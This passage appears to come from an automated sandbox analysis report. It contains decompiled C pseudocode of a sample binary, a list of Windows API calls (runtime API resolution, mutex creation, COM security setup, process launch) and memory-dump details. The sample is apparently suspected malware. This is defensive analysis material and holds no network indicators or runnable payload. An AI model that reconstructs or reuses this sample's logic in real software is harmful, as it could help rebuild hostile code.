    												 *( *((intOrPtr*)(_t466 - 0x5bc)) + 0xc) =  *(_t466 - 0x28);
    												_t261 = _t465 -  *(_t466 - 0x3c);
    												__eflags = _t261;
    												asm("sbb edx, [ebp-0x38]");
    												 *(_t466 - 0x48) = _t459;
    												if(__eflags < 0) {
    													L42:
    													E003C42A0(__eflags, _t466 - 0x5c0);
    													_t474 = _t468 + 4;
    													_t263 = E003D12C0();
    													_push(4);
    													__eflags = _t263 - _t333;
    													if(__eflags >= 0) {
    														if(__eflags != 0) {
    															_push(_t466 - 0x9c0);
    															E003C9090(__eflags);
    															E003C9090(__eflags, _t466 - 0xdc0, 7);
    															_push(_t466 - 0xdc0);
    															_push(_t466 - 0x9c0);
    															_push(0xe);
    															_t440 = _t466 - 0x5c0;
    															_push(_t440);
    														} else {
    															_push(_t466 - 0x9c0);
    															E003C9090(__eflags);
    															E003C9090(__eflags, _t466 - 0xdc0, 6);
    															_push(_t466 - 0xdc0);
    															_t440 = _t466 - 0x9c0;
    															_push(_t440);
    															_push(0xe);
    															_push(_t466 - 0x5c0);
    														}
    													} else {
    														_push(_t466 - 0x9c0);
    														E003C9090(__eflags);
    														E003C9090(__eflags, _t466 - 0xdc0, 5);
    														_t440 = _t466 - 0xdc0;
    														_push(_t440);
    														_push(_t466 - 0x9c0);
    														_push(0xe);
    														_push(_t466 - 0x5c0);
    													}
    													_t267 = E003C5A10();
    													_t475 = _t474 + 0x20;
    													 *(_t466 - 0x48) = _t333;
    													do {
    														__imp___time64(0);
    														_t465 = _t267;
    														_t268 =  *0x3e8570; // 0x0
    														_t468 = _t475 + 4;
    														_t459 = _t440;
    														__eflags = _t268 - 2;
    														if(_t268 == 2) {
    															L52:
    															_t270 = E003C36E0(_t459, _t465, _t466 - 0xc, _t466 - 0x5c0,  *(_t466 - 0x14),  *(_t466 - 0x10));
    															_t468 = _t468 + 0x10;
    															asm("sbb edx, 0x0");
    															 *(_t466 - 0x14) = _t465 - 0x708;
    															 *(_t466 - 0x10) = _t459;
    															__eflags = _t270 - 1;
    															if(_t270 == 1) {
    																 *0x3e85ac = _t270;
    															}
    															L54:
    															_t272 = _t465 -  *(_t466 - 0x44);
    															__eflags = _t272;
    															asm("sbb ecx, [ebp-0x40]");
    															 *(_t466 - 0x5c) = _t459;
    															if(__eflags < 0) {
    																L61:
    																_t465 = _t465 -  *(_t466 - 0x30);
    																__eflags = _t465;
    																asm("sbb edi, [ebp-0x2c]");
    																 *(_t466 - 0x5c) = _t459;
    																if(__eflags < 0) {
    																	L68:
    																	_t273 = E003C9890( *((intOrPtr*)(_t466 - 0x5bc)));
    																	__eflags = _t273;
    																	if(_t273 == 0) {
    																		L83:
    																		_t333 = 0;
    																		__eflags = 0;
    																		goto L84;
    																	}
    																	_push(1);
    																	_push(_t466 - 0x5c0);
    																	_t274 = E003C5A10();
    																	_t468 = _t468 + 8;
    																	__eflags = _t274;
    																	if(__eflags == 0) {
    																		goto L83;
    																	}
    																	_t440 = _t466 - 0x5c0;
    																	_t275 = E003C7560(_t333, __eflags, _t440);
    																	_t468 = _t468 + 4;
    																	__eflags = _t275;
    																	if(_t275 == 0) {
    																		__eflags =  *0x3e85ac;
    																		if( *0x3e85ac != 0) {
    																			L88:
    																			E003C1700(_t466 - 0xc);
    																			E003CF850(_t333, _t466 - 0x5c0);
    																			E003CC930(_t466 - 4);
    																			_t333 = 0;
    																			__eflags = 0;
    																			goto L89;
    																		}
    																		goto L83;
    																	}
    																	__eflags =  *0x3e85ac;
    																	if( *0x3e85ac != 0) {
    																		goto L88;
    																	}
    																	_t279 =  *0x3e8584; // 0x0
    																	_t465 = 0xa;
    																	__eflags = _t279;
    																	if(_t279 == 0) {
    																		_t280 =  *(_t466 - 0x24);
    																		__eflags = _t280;
    																		if(_t280 <= 0) {
    																			while(1) {
    																				L76:
    																				_t390 =  *0x3e8584; // 0x0
    																				__eflags = _t390;
    																				if(_t390 != 0) {
    																					goto L78;
    																				}
    																				_t440 =  *0x3e8628; // 0x622508
    																				 *((intOrPtr*)( *((intOrPtr*)(_t440 + 0xc8))))(0x4e20);
    																				_t465 = _t465 - 1;
    																				__eflags = _t465;
    																				if(_t465 > 0) {
    																					continue;
    																				}
    																				goto L78;
    																			}
    																			goto L78;
    																		}
    																		L75:
    																		_t284 = _t280 - 1;
    																		__eflags = _t284;
    																		 *(_t466 - 0x24) = _t284;
    																		_t465 = 1;
    																		goto L76;
    																	}
    																	_t158 = _t465 - 5; // 0x5
    																	_t280 = _t158;
    																	 *0x3e8584 = 0;
    																	goto L75;
    																}
    																if(__eflags > 0) {
    																	L64:
    																	_t465 = E003CF2D0(_t466 - 0x5c0);
    																	_t286 = E003C99A0(_t333, _t466 - 0x19, _t459, _t285, _t285);
    																	_push(8);
    																	__eflags = _t286;
    																	if(__eflags == 0) {
    																		_push(_t466 - 0x9c0);
    																		E003C9090(__eflags);
    																		E003C9090(__eflags, _t466 - 0xdc0, 0xa);
    																		_push(_t466 - 0xdc0);
    																		_t446 = _t466 - 0x9c0;
    																		_push(_t446);
    																		_push(0xe);
    																		_push(_t466 - 0x5c0);
    																	} else {
    																		_push(_t466 - 0x9c0);
    																		E003C9090(__eflags);
    																		E003C9090(__eflags, _t466 - 0xdc0, 9);
    																		_t446 = _t466 - 0xdc0;
    																		_push(_t446);
    																		_push(_t466 - 0x9c0);
    																		_push(0xe);
    																		_push(_t466 - 0x5c0);
    																	}
    																	E003C5A10();
    																	_t292 = E003CBB40(_t465);
    																	__imp___time64(0);
    																	_t468 = _t468 + 0x28;
    																	 *(_t466 - 0x30) = _t292;
    																	 *(_t466 - 0x2c) = _t446;
    																	goto L68;
    																}
    																__eflags = _t465 - 0x7080;
    																if(_t465 <= 0x7080) {
    																	goto L68;
    																}
    																goto L64;
    															}
    															if(__eflags > 0) {
    																L57:
    																_t448 =  *0x3e857c; // 0x0
    																_t298 = _t465 -  *((intOrPtr*)( *((intOrPtr*)( *(_t466 - 0x5b8) + 0x28)) + _t448 * 8));
    																__eflags = _t298;
    																_t333 = _t459;
    																asm("sbb ebx, [ecx+edx*8+0x4]");
    																 *(_t466 - 0x5c) = _t459;
    																if(__eflags < 0) {
    																	goto L61;
    																}
    																if(__eflags > 0) {
    																	L60:
    																	 *(_t466 - 0x44) = _t465;
    																	 *(_t466 - 0x40) = _t459;
    																	_t300 = E003C1FE0(_t333, _t459, _t465, _t466 - 0xc, _t466 - 0x5c0, _t466 - 0x5b8);
    																	_t468 = _t468 + 0xc;
    																	__eflags = _t300;
    																	if(_t300 != 0) {
    																		_t301 = E003D0AD0(_t466 - 0x5c0,  *((intOrPtr*)( *(_t466 - 0x5b8) + 0x14)));
    																		__eflags = _t301;
    																		if(_t301 == 0) {
    																			goto L88;
    																		}
    																		 *0x3e857c = 0;
    																		goto L83;
    																	}
    																	goto L61;
    																}
    																__eflags = _t298 - 0x3840;
    																if(_t298 <= 0x3840) {
    																	goto L61;
    																}
    																goto L60;
    															}
    															__eflags = _t272 - 0x4b0;
    															if(_t272 <= 0x4b0) {
    																goto L61;
    															}
    															goto L57;
    														}
    														_t303 = _t465 -  *(_t466 - 0x14);
    														__eflags = _t303;
    														asm("sbb ecx, [ebp-0x10]");
    														 *(_t466 - 0x5c) = _t459;
    														if(__eflags < 0) {
    															goto L54;
    														}
    														if(__eflags > 0) {
    															goto L52;
    														}
    														__eflags = _t303 - 0xe10;
    														if(_t303 <= 0xe10) {
    															goto L54;
    														}
    														goto L52;
    														L78:
    														_t267 =  *(_t466 - 0x48) + 1;
    														 *(_t466 - 0x48) = _t267;
    														__eflags = _t267 - 0x64;
    													} while (_t267 < 0x64);
    													goto L83;
    												}
    												if(__eflags > 0) {
    													L40:
    													_t313 = E003CAC90( *(_t466 - 0x5b8), _t466 - 0x5c0);
    													_t468 = _t468 + 8;
    													__eflags = _t313;
    													if(__eflags == 0) {
    														goto L84;
    													}
    													 *(_t466 - 0x3c) = _t465;
    													 *(_t466 - 0x38) = _t459;
    													goto L42;
    												}
    												__eflags = _t261 - 0xe10;
    												if(__eflags <= 0) {
    													goto L42;
    												}
    												goto L40;
    											}
    											__eflags = _t258 - 1;
    											if(_t258 != 1) {
    												E003CC870(_t466 - 0x5c0, _t258);
    												_t468 = _t468 + 8;
    											}
    											_t405 =  *0x3e8628; // 0x622508
    											 *((intOrPtr*)( *((intOrPtr*)(_t405 + 0xc8))))(0x3e8);
    											goto L84;
    										}
    										if(__eflags > 0) {
    											L28:
    											_t318 = E003CD890(_t465, __eflags, _t466 - 0xc, _t466 - 0x5c0, _t466 - 0x58);
    											_t473 = _t473 + 0xc;
    											__eflags = _t318;
    											if(_t318 == 0) {
    												_t319 =  *((intOrPtr*)( *(_t466 - 0x5b8) + 0x24));
    												_t407 =  *0x3e857c; // 0x0
    												 *(_t319 + _t407 * 8) = _t465;
    												_t455 =  *0x3e857c; // 0x0
    												 *(_t319 + 4 + _t455 * 8) = _t459;
    												goto L33;
    											}
    											__eflags = _t318 - 1;
    											if(_t318 != 1) {
    												E003CC870(_t466 - 0x5c0, _t318);
    												_t468 = _t473 + 8;
    											}
    											_t320 =  *0x3e8628; // 0x622508
    											 *((intOrPtr*)( *((intOrPtr*)(_t320 + 0xc8))))(0x3e8);
    											goto L83;
    										}
    										__eflags = _t256 - 0x3840;
    										if(__eflags <= 0) {
    											goto L33;
    										}
    										goto L28;
    									}
    									_t457 =  *0x3e8628; // 0x622508
    									 *((intOrPtr*)( *((intOrPtr*)(_t457 + 0xc8))))(0x3e8);
    									L84:
    									_t385 =  *0x3e857c; // 0x0
    									_t249 =  *(_t466 - 0x5b8);
    									_t369 = _t385 + 1;
    									 *0x3e857c = _t369;
    									__eflags = _t369 -  *((intOrPtr*)(_t249 + 0x18));
    								} while (__eflags < 0);
    								L85:
    								_t251 = E003E0A40(_t459, _t465, __eflags, _t466 - 0xc, _t466 - 0x5b8);
    								_t468 = _t468 + 8;
    								__eflags = _t251;
    								if(_t251 == 0) {
    									__eflags =  *(_t466 - 0x20) - _t333;
    									if(__eflags == 0) {
    										L003E0D30(_t333, _t459, _t465, __eflags, _t466 - 0xc, _t466 - 0x5c0);
    										_t468 = _t468 + 8;
    									}
    								}
    							}
    						} else {
    							L18:
    							E003C1700(_t466 - 0xc);
    							E003CF850(_t333, _t466 - 0x5c0);
    							E003CC930(_t466 - 4);
    							goto L89;
    						}
    					} else {
    						E003CC930(_t466 - 4);
    						goto L89;
    					}
    				} else {
    					E003E0BB0(_t333, _t479);
    					E003CC930(_t466 - 4);
    					goto L89;
    				}
    			}


    APIs
    • Sleep.KERNELBASE(00000001), ref: 003CFC40
    • SetCurrentDirectoryW.KERNELBASE(?), ref: 003CFCB3
    • srand.MSVCRT ref: 003CFCC4
      • Part of subcall function 003CEB30: LoadLibraryW.KERNEL32(?), ref: 003CEB82
      • Part of subcall function 003CEB30: LoadLibraryW.KERNEL32(?), ref: 003CEBA9
      • Part of subcall function 003CEB30: GetProcAddress.KERNEL32(00000000,?), ref: 003CEBD7
      • Part of subcall function 003CEB30: GetProcAddress.KERNEL32(00000000,?), ref: 003CEBFF
      • Part of subcall function 003CEB30: GetProcAddress.KERNEL32(00000000,?), ref: 003CEC27
      • Part of subcall function 003CEB30: GetProcAddress.KERNEL32(00000000,?), ref: 003CEC4F
      • Part of subcall function 003CEB30: GetProcAddress.KERNEL32(00000000,?), ref: 003CEC77
      • Part of subcall function 003CBAF0: CoInitializeEx.OLE32(00000000,00000000), ref: 003CBAF4
      • Part of subcall function 003CBAF0: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 003CBB13
    • ExitProcess.KERNEL32 ref: 003D04F6
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
      • Part of subcall function 003C3500: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000001,00000000,00000000,003E8C3C,000003E7), ref: 003C3542
      • Part of subcall function 003C3500: CreateMutexW.KERNELBASE(?,00000001,?), ref: 003C358B
      • Part of subcall function 003C3500: ExitProcess.KERNEL32 ref: 003C35AE
      • Part of subcall function 003E0BB0: ??2@YAPAXI@Z.MSVCRT ref: 003E0C80
      • Part of subcall function 003E0BB0: ??3@YAXPAX@Z.MSVCRT ref: 003E0D1D
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
      • Part of subcall function 003C9480: FreeLibrary.KERNELBASE(00000000,003D04F0), ref: 003C94B1
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd

    Control-flow Graph

    C-Code - Quality: 52%
    			E003CFD69() {
    				void* _t181;
    				void* _t188;
    				signed int* _t198;
    				int _t207;
    				int _t212;
    				int _t214;
    				int _t218;
    				int _t219;
    				int _t221;
    				int _t224;
    				void* _t226;
    				int _t230;
    				int _t231;
    				int _t233;
    				int _t235;
    				int _t236;
    				int _t237;
    				int _t238;
    				int _t242;
    				int _t243;
    				int _t247;
    				int _t249;
    				int _t255;
    				int _t261;
    				int _t263;
    				int _t264;
    				int _t266;
    				int _t276;
    				int _t281;
    				intOrPtr _t282;
    				int _t283;
    				signed int* _t290;
    				int _t293;
    				signed int _t313;
    				signed int _t316;
    				signed int _t332;
    				int _t337;
    				int _t352;
    				signed int _t354;
    				int _t361;
    				int _t363;
    				int _t364;
    				int _t365;
    				signed short* _t366;
    				int _t371;
    				signed int _t372;
    				int _t377;
    				int _t383;
    				signed int _t385;
    				signed int _t392;
    				int _t394;
    				int _t395;
    				void* _t396;
    				void* _t398;
    				int _t399;
    				void* _t400;
    				void* _t401;
    				void* _t402;
    				void* _t403;
    				void* _t405;
    				void* _t408;
    				void* _t409;
    				void* _t410;
    				void* _t412;
    				void* _t415;
    
    				E003C2420(_t397);
    				L003C1CB0();
    				_t402 = _t401 + 4;
    				_t293 =  *0x3e8628; // 0x622508
    				 *0x3e8570 = _t289;
    				 *0x3e8584 = _t289;
    				 *0x3e8574 = _t289;
    				 *0x3e8578 = _t289;
    				 *((intOrPtr*)( *((intOrPtr*)(_t293 + 0xcc))))(0x3e8594, 0x800, _t397);
    				E003C1B20(_t400 - 0x5c0,  *((intOrPtr*)(_t293 + 0xcc)), _t412);
    				_t181 = E003CBB30(_t400 - 0xc);
    				_push(0x34);
    				 *(_t400 - 0x58) = _t289;
    				 *(_t400 - 0x28) = _t289;
    				L003CA47E();
    				_t403 = _t402 + 4;
    				_t413 = _t181 - _t289;
    				if(_t181 == _t289) {
    					 *(_t400 - 0x5b8) = _t289;
    				} else {
    					 *(_t400 - 0x5b8) = E003C70B0(_t181);
    				}
    				E003C9090(_t413, _t400 - 0x9c0, 3);
    				E003CF550(_t400 - 0x50, _t289, _t400 - 0x9c0, 0xa, _t400 - 0x54, _t400 - 0x50);
    				E003C1F00(_t400 - 0xc,  *((intOrPtr*)(_t400 - 0x54)),  *((intOrPtr*)(_t400 - 0x50)));
    				_t188 = E003C69F0(_t400 - 0x5b8, _t400 - 0xc, _t400 - 0x5b8);
    				_t405 = _t403 + 0x24;
    				if(_t188 != 0) {
    					 *(_t400 - 0x5c0) = _t400 - 0xc;
    					__eflags = E003D0AD0(_t400 - 0x5c0,  *((intOrPtr*)( *(_t400 - 0x5b8) + 0x14)));
    					if(__eflags == 0) {
    						goto L5;
    					} else {
    						E003C5700( *((intOrPtr*)(_t400 - 0x5bc)), __eflags);
    						 *0x3e85ac = _t289;
    						 *(_t400 - 0x30) = _t289;
    						 *(_t400 - 0x2c) = _t289;
    						 *(_t400 - 0x14) = _t289;
    						 *(_t400 - 0x10) = _t289;
    						 *(_t400 - 0x3c) = _t289;
    						 *(_t400 - 0x38) = _t289;
    						 *(_t400 - 0x44) = _t289;
    						 *(_t400 - 0x40) = _t289;
    						 *((intOrPtr*)( *( *0x3e8628)))(_t289, _t289, E003E08A0, _t400 - 0x5c0, _t289, _t400 - 0x74);
    						 *(_t400 - 0x24) = _t289;
    						while(1) {
    							_t212 =  *(_t400 - 0x5b8);
    							_t316 = 0;
    							 *0x3e857c = 0;
    							 *(_t400 - 0x20) = _t289;
    							__eflags =  *((intOrPtr*)(_t212 + 0x18)) - _t289;
    							if(__eflags <= 0) {
    								goto L72;
    							}
    							do {
    								_t371 =  *( *((intOrPtr*)(_t212 + 0x20)) + _t316 * 4);
    								_t218 = L003C94D0(_t400 - 0x5c0,  *((intOrPtr*)( *((intOrPtr*)(_t212 + 0x1c)) + _t316 * 4)), _t371);
    								__eflags = _t218;
    								if(_t218 != 0) {
    									__imp___time64(_t289);
    									_t395 = _t371;
    									_t372 =  *0x3e857c; // 0x0
    									_t408 = _t405 + 4;
    									_t397 = _t218;
    									_t219 = _t218 -  *((intOrPtr*)( *((intOrPtr*)( *(_t400 - 0x5b8) + 0x24)) + _t372 * 8));
    									__eflags = _t219;
    									asm("sbb ebx, [ecx+edx*8+0x4]");
    									 *(_t400 - 0x48) = _t395;
    									if(__eflags < 0) {
    										L20:
    										_t289 = 0;
    										_t221 = E003D1B80(_t397, _t400 - 0xc, _t400 - 0x5c0, _t400 - 0x28);
    										_t405 = _t408 + 0xc;
    										__eflags = _t221;
    										if(_t221 == 0) {
    											 *(_t400 - 0x20) =  *(_t400 - 0x20) + 1;
    											 *( *((intOrPtr*)(_t400 - 0x5bc)) + 0xc) =  *(_t400 - 0x28);
    											_t224 = _t397 -  *(_t400 - 0x3c);
    											__eflags = _t224;
    											asm("sbb edx, [ebp-0x38]");
    											 *(_t400 - 0x48) = _t395;
    											if(__eflags < 0) {
    												L29:
    												E003C42A0(__eflags, _t400 - 0x5c0);
    												_t409 = _t405 + 4;
    												_t226 = E003D12C0();
    												_push(4);
    												__eflags = _t226 - _t289;
    												if(__eflags >= 0) {
    													if(__eflags != 0) {
    														_push(_t400 - 0x9c0);
    														E003C9090(__eflags);
    														E003C9090(__eflags, _t400 - 0xdc0, 7);
    														_push(_t400 - 0xdc0);
    														_push(_t400 - 0x9c0);
    														_push(0xe);
    														_t377 = _t400 - 0x5c0;
    														_push(_t377);
    													} else {
    														_push(_t400 - 0x9c0);
    														E003C9090(__eflags);
    														E003C9090(__eflags, _t400 - 0xdc0, 6);
    														_push(_t400 - 0xdc0);
    														_t377 = _t400 - 0x9c0;
    														_push(_t377);
    														_push(0xe);
    														_push(_t400 - 0x5c0);
    													}
    												} else {
    													_push(_t400 - 0x9c0);
    													E003C9090(__eflags);
    													E003C9090(__eflags, _t400 - 0xdc0, 5);
    													_t377 = _t400 - 0xdc0;
    													_push(_t377);
    													_push(_t400 - 0x9c0);
    													_push(0xe);
    													_push(_t400 - 0x5c0);
    												}
    												_t230 = E003C5A10();
    												_t410 = _t409 + 0x20;
    												 *(_t400 - 0x48) = _t289;
    												do {
    													__imp___time64(0);
    													_t397 = _t230;
    													_t231 =  *0x3e8570; // 0x0
    													_t405 = _t410 + 4;
    													_t395 = _t377;
    													__eflags = _t231 - 2;
    													if(_t231 == 2) {
    														L39:
    														_t233 = E003C36E0(_t395, _t397, _t400 - 0xc, _t400 - 0x5c0,  *(_t400 - 0x14),  *(_t400 - 0x10));
    														_t405 = _t405 + 0x10;
    														asm("sbb edx, 0x0");
    														 *(_t400 - 0x14) = _t397 - 0x708;
    														 *(_t400 - 0x10) = _t395;
    														__eflags = _t233 - 1;
    														if(_t233 == 1) {
    															 *0x3e85ac = _t233;
    														}
    														L41:
    														_t235 = _t397 -  *(_t400 - 0x44);
    														__eflags = _t235;
    														asm("sbb ecx, [ebp-0x40]");
    														 *(_t400 - 0x5c) = _t395;
    														if(__eflags < 0) {
    															L48:
    															_t397 = _t397 -  *(_t400 - 0x30);
    															__eflags = _t397;
    															asm("sbb edi, [ebp-0x2c]");
    															 *(_t400 - 0x5c) = _t395;
    															if(__eflags < 0) {
    																L55:
    																_t236 = E003C9890( *((intOrPtr*)(_t400 - 0x5bc)));
    																__eflags = _t236;
    																if(_t236 == 0) {
    																	L70:
    																	_t289 = 0;
    																	__eflags = 0;
    																	goto L71;
    																}
    																_push(1);
    																_push(_t400 - 0x5c0);
    																_t237 = E003C5A10();
    																_t405 = _t405 + 8;
    																__eflags = _t237;
    																if(__eflags == 0) {
    																	goto L70;
    																}
    																_t377 = _t400 - 0x5c0;
    																_t238 = E003C7560(_t289, __eflags, _t377);
    																_t405 = _t405 + 4;
    																__eflags = _t238;
    																if(_t238 == 0) {
    																	__eflags =  *0x3e85ac;
    																	if( *0x3e85ac != 0) {
    																		L75:
    																		E003C1700(_t400 - 0xc);
    																		E003CF850(_t289, _t400 - 0x5c0);
    																		E003CC930(_t400 - 4);
    																		_t289 = 0;
    																		__eflags = 0;
    																		L76:
    																		_t415 =  *0x3e85ac - _t289; // 0x0
    																		if(_t415 == 0) {
    																			L89:
    																			E003C9480();
    																			E003C7E10();
    																			ExitProcess(_t289);
    																		}
    																		_t361 =  *0x3e8628; // 0x622508
    																		_t398 = 0;
    																		 *((intOrPtr*)(_t400 - 0x70)) = 0;
    																		 *((intOrPtr*)(_t400 - 0x6c)) = 0;
    																		 *((intOrPtr*)(_t400 - 0x68)) = 0;
    																		 *((intOrPtr*)(_t400 - 0x64)) = 0;
    																		 *(_t400 - 0x18) = 0;
    																		 *((intOrPtr*)(_t400 - 0xb8)) = 0x44;
    																		 *((intOrPtr*)( *((intOrPtr*)(_t361 + 0xb8))))(_t400 - 0xb8);
    																		E003C8030(_t400 - 0x18);
    																		_t198 = E003D1D90(0x20a, 0);
    																		_t290 = _t198;
    																		if(_t290 == 0) {
    																			L88:
    																			_t363 =  *0x3e8628; // 0x622508
    																			 *((intOrPtr*)( *((intOrPtr*)(_t363 + 0xd8))))( *(_t400 - 0x18), _t398, _t398, _t398, _t398, _t398, _t398, _t290, _t400 - 0xb8, _t400 - 0x70);
    																			_t364 =  *0x3e8628; // 0x622508
    																			 *((intOrPtr*)( *((intOrPtr*)(_t364 + 0xf8))))( *((intOrPtr*)(_t400 - 0x70)));
    																			_t365 =  *0x3e8628; // 0x622508
    																			 *((intOrPtr*)( *((intOrPtr*)(_t365 + 0xf8))))( *((intOrPtr*)(_t400 - 0x6c)));
    																			E003CBB40( *(_t400 - 0x18));
    																			_t289 = 0;
    																			goto L89;
    																		}
    																		_t366 =  *(_t400 - 0x18);
    																		_t399 = 0x104;
    																		_t396 = 0;
    																		while(1) {
    																			_t167 = _t399 + 0x7ffffefa; // 0x7ffffffe
    																			if(_t167 == 0) {
    																				break;
    																			}
    																			_t313 =  *_t366 & 0x0000ffff;
    																			if(_t313 == 0) {
    																				break;
    																			}
    																			 *_t198 = _t313;
    																			_t198 =  &(_t198[0]);
    																			_t366 =  &(_t366[1]);
    																			_t399 = _t399 - 1;
    																			if(_t399 != 0) {
    																				continue;
    																			}
    																			L84:
    																			_t198 = _t198 - 2;
    																			_t396 = 0x8007007a;
    																			L85:
    																			 *_t198 = 0;
    																			if(_t396 >= 0) {
    																				_t207 =  *0x3e8628; // 0x622508
    																				 *((intOrPtr*)( *((intOrPtr*)(_t207 + 0x1e8))))(_t290);
    																			}
    																			_t398 = 0;
    																			goto L88;
    																		}
    																		__eflags = _t399;
    																		if(_t399 != 0) {
    																			goto L85;
    																		}
    																		goto L84;
    																	}
    																	goto L70;
    																}
    																__eflags =  *0x3e85ac;
    																if( *0x3e85ac != 0) {
    																	goto L75;
    																}
    																_t242 =  *0x3e8584; // 0x0
    																_t397 = 0xa;
    																__eflags = _t242;
    																if(_t242 == 0) {
    																	_t243 =  *(_t400 - 0x24);
    																	__eflags = _t243;
    																	if(_t243 <= 0) {
    																		while(1) {
    																			L63:
    																			_t337 =  *0x3e8584; // 0x0
    																			__eflags = _t337;
    																			if(_t337 != 0) {
    																				goto L65;
    																			}
    																			_t377 =  *0x3e8628; // 0x622508
    																			 *((intOrPtr*)( *((intOrPtr*)(_t377 + 0xc8))))(0x4e20);
    																			_t397 = _t397 - 1;
    																			__eflags = _t397;
    																			if(_t397 > 0) {
    																				continue;
    																			}
    																			goto L65;
    																		}
    																		goto L65;
    																	}
    																	L62:
    																	_t247 = _t243 - 1;
    																	__eflags = _t247;
    																	 *(_t400 - 0x24) = _t247;
    																	_t397 = 1;
    																	goto L63;
    																}
    																_t138 = _t397 - 5; // 0x5
    																_t243 = _t138;
    																 *0x3e8584 = 0;
    																goto L62;
    															}
    															if(__eflags > 0) {
    																L51:
    																_t397 = E003CF2D0(_t400 - 0x5c0);
    																_t249 = E003C99A0(_t289, _t400 - 0x19, _t395, _t248, _t248);
    																_push(8);
    																__eflags = _t249;
    																if(__eflags == 0) {
    																	_push(_t400 - 0x9c0);
    																	E003C9090(__eflags);
    																	E003C9090(__eflags, _t400 - 0xdc0, 0xa);
    																	_push(_t400 - 0xdc0);
    																	_t383 = _t400 - 0x9c0;
    																	_push(_t383);
    																	_push(0xe);
    																	_push(_t400 - 0x5c0);
    																} else {
    																	_push(_t400 - 0x9c0);
    																	E003C9090(__eflags);
    																	E003C9090(__eflags, _t400 - 0xdc0, 9);
    																	_t383 = _t400 - 0xdc0;
    																	_push(_t383);
    																	_push(_t400 - 0x9c0);
    																	_push(0xe);
    																	_push(_t400 - 0x5c0);
    																}
    																E003C5A10();
    																_t255 = E003CBB40(_t397);
    																__imp___time64(0);
    																_t405 = _t405 + 0x28;
    																 *(_t400 - 0x30) = _t255;
    																 *(_t400 - 0x2c) = _t383;
    																goto L55;
    															}
    															__eflags = _t397 - 0x7080;
    															if(_t397 <= 0x7080) {
    																goto L55;
    															}
    															goto L51;
    														}
    														if(__eflags > 0) {
    															L44:
    															_t385 =  *0x3e857c; // 0x0
    															_t261 = _t397 -  *((intOrPtr*)( *((intOrPtr*)( *(_t400 - 0x5b8) + 0x28)) + _t385 * 8));
    															__eflags = _t261;
    															_t289 = _t395;
    															asm("sbb ebx, [ecx+edx*8+0x4]");
    															 *(_t400 - 0x5c) = _t395;
    															if(__eflags < 0) {
    																goto L48;
    															}
    															if(__eflags > 0) {
    																L47:
    																 *(_t400 - 0x44) = _t397;
    																 *(_t400 - 0x40) = _t395;
    																_t263 = E003C1FE0(_t289, _t395, _t397, _t400 - 0xc, _t400 - 0x5c0, _t400 - 0x5b8);
    																_t405 = _t405 + 0xc;
    																__eflags = _t263;
    																if(_t263 != 0) {
    																	_t264 = E003D0AD0(_t400 - 0x5c0,  *((intOrPtr*)( *(_t400 - 0x5b8) + 0x14)));
    																	__eflags = _t264;
    																	if(_t264 == 0) {
    																		goto L75;
    																	}
    																	 *0x3e857c = 0;
    																	goto L70;
    																}
    																goto L48;
    															}
    															__eflags = _t261 - 0x3840;
    															if(_t261 <= 0x3840) {
    																goto L48;
    															}
    															goto L47;
    														}
    														__eflags = _t235 - 0x4b0;
    														if(_t235 <= 0x4b0) {
    															goto L48;
    														}
    														goto L44;
    													}
    													_t266 = _t397 -  *(_t400 - 0x14);
    													__eflags = _t266;
    													asm("sbb ecx, [ebp-0x10]");
    													 *(_t400 - 0x5c) = _t395;
    													if(__eflags < 0) {
    														goto L41;
    													}
    													if(__eflags > 0) {
    														goto L39;
    													}
    													__eflags = _t266 - 0xe10;
    													if(_t266 <= 0xe10) {
    														goto L41;
    													}
    													goto L39;
    													L65:
    													_t230 =  *(_t400 - 0x48) + 1;
    													 *(_t400 - 0x48) = _t230;
    													__eflags = _t230 - 0x64;
    												} while (_t230 < 0x64);
    												goto L70;
    											}
    											if(__eflags > 0) {
    												L27:
    												_t276 = E003CAC90( *(_t400 - 0x5b8), _t400 - 0x5c0);
    												_t405 = _t405 + 8;
    												__eflags = _t276;
    												if(__eflags == 0) {
    													goto L71;
    												}
    												 *(_t400 - 0x3c) = _t397;
    												 *(_t400 - 0x38) = _t395;
    												goto L29;
    											}
    											__eflags = _t224 - 0xe10;
    											if(__eflags <= 0) {
    												goto L29;
    											}
    											goto L27;
    										}
    										__eflags = _t221 - 1;
    										if(_t221 != 1) {
    											E003CC870(_t400 - 0x5c0, _t221);
    											_t405 = _t405 + 8;
    										}
    										_t352 =  *0x3e8628; // 0x622508
    										 *((intOrPtr*)( *((intOrPtr*)(_t352 + 0xc8))))(0x3e8);
    										goto L71;
    									}
    									if(__eflags > 0) {
    										L15:
    										_t281 = E003CD890(_t397, __eflags, _t400 - 0xc, _t400 - 0x5c0, _t400 - 0x58);
    										_t408 = _t408 + 0xc;
    										__eflags = _t281;
    										if(_t281 == 0) {
    											_t282 =  *((intOrPtr*)( *(_t400 - 0x5b8) + 0x24));
    											_t354 =  *0x3e857c; // 0x0
    											 *(_t282 + _t354 * 8) = _t397;
    											_t392 =  *0x3e857c; // 0x0
